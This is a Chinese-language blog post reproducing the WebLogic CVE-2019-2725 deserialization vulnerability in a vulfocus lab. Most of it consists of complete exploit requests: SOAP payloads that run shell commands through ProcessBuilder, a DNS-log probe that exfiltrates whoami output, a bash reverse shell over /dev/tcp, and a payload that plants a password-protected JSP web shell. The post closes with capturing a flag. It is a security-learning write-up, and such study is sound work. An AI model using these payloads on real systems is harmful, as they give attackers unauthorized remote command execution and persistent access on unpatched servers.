CVE-2019-2725 Weblogic 反序列化漏洞
原创CVE-2019-2725 Weblogic 反序列化漏洞
原创
用户8478947
发布于 2022-12-29 16:55:10
发布于 2022-12-29 16:55:10
代码可运行
文章被收录于专栏:安全学习
运行总次数:0
代码可运行
漏洞简介
事项 | 描述 |
|---|---|
漏洞概述 | wls9-async等组件为WebLogic Server提供异步通讯服务,默认应用于WebLogic部分版本。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。 |
影响范围 | 10.3.6.0.0 12.1.3.0.0 |
漏洞编号 | CVE-2019-2725 |
漏洞搭建
这里使用vulfocus进行复现。
漏洞复现
访问http://192.168.146.167:13315/_async/AsyncResponseService,发现访问成功,说明可能存在漏洞。
抓包,修改恶意payload
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.146.167:13315
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: ADMINCONSOLESESSION=48n0jmnNnY4mLX2dvcgqyLG7zK9jWCxwyYnrywtbStm7PZZh8kCS!35670488; JSESSIONID=1hdsjmncSnGCmnHqz11LTLhH4qPcWQ8JYyl7nT1M82h2YVpzQRvW!35670488
Connection: close
Content-Type: text/xml
Content-Length: 758
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>ping czn2lo.dnslog.cn
</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
发现dnslog成功收到数据,说明确实存在漏洞。
查看能否执行whoami命令。
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.146.167:13315
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: ADMINCONSOLESESSION=48n0jmnNnY4mLX2dvcgqyLG7zK9jWCxwyYnrywtbStm7PZZh8kCS!35670488; JSESSIONID=1hdsjmncSnGCmnHqz11LTLhH4qPcWQ8JYyl7nT1M82h2YVpzQRvW!35670488
Connection: close
Content-Type: text/xml
Content-Length: 761
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>ping `whoami`.czn2lo.dnslog.cn
</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>发现成功执行whoami命令
开始反弹shell,这里反弹shell时需要把&进行转义处理,转义为&
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.146.167:13315
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: ADMINCONSOLESESSION=48n0jmnNnY4mLX2dvcgqyLG7zK9jWCxwyYnrywtbStm7PZZh8kCS!35670488; JSESSIONID=1hdsjmncSnGCmnHqz11LTLhH4qPcWQ8JYyl7nT1M82h2YVpzQRvW!35670488
Connection: close
Content-Type: text/xml
Content-Length: 782
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/192.168.146.167/9999>&1
</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<java version="1.4.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/beifen.jsp</string>
<void method="println">
<string><![CDATA[<% if("secfree".equals(request.getParameter("password"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("command")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>]]>
</string>
</void>
<void method="close"/>
</object>
</java>
</java>
</work:WorkContext>
</soapenv:Header><soapenv:Body/></soapenv:Envelope>然后发现虽然反弹了shell,但是无法执行任何操作。
然后重新抓包再发送就能反弹一个能够执行命令的shell了。
进入/tmp目录下,查看flag。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
